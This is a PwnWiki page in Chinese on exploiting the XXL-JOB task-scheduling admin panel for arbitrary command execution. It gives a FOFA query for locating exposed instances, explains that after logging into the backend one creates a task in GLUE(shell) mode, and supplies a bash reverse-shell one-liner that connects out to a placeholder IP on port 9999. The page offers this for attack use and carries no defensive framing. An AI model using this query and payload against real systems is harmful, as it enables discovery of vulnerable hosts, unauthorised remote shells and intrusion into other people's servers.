XXL-JOB 任務調度中心 後台任意命令執行漏洞

From PwnWiki
Revision as of 10:41, 10 May 2021 by Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> app="XXL-JOB" || title="任务调度中心" </pre> ==漏洞利用== 登錄後台增加一個任務: 600px 注意運行模式需要為 GL...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

FOFA

app="XXL-JOB" || title="任务调度中心"

漏洞利用

登錄後台增加一個任務:

Xxl-4.png

注意運行模式需要為 GLUE(shell)


Xxl-5.png

點擊 GLUE IDE編輯腳本


Xxl-6.png

Xxl-7.png

執行探測出網,和任務調用是否可執行

反彈一個shell 

#!/bin/bash
bash -c 'exec bash -i &>/dev/tcp/xxx.xxx.xxx.xxx/9999 <&1'


參考

https://short.pwnwiki.org/?c=PaRcxf

Retrieved from "https://pwnwiki.com/index.php?title=XXL-JOB_任務調度中心_後台任意命令執行漏洞&oldid=2752"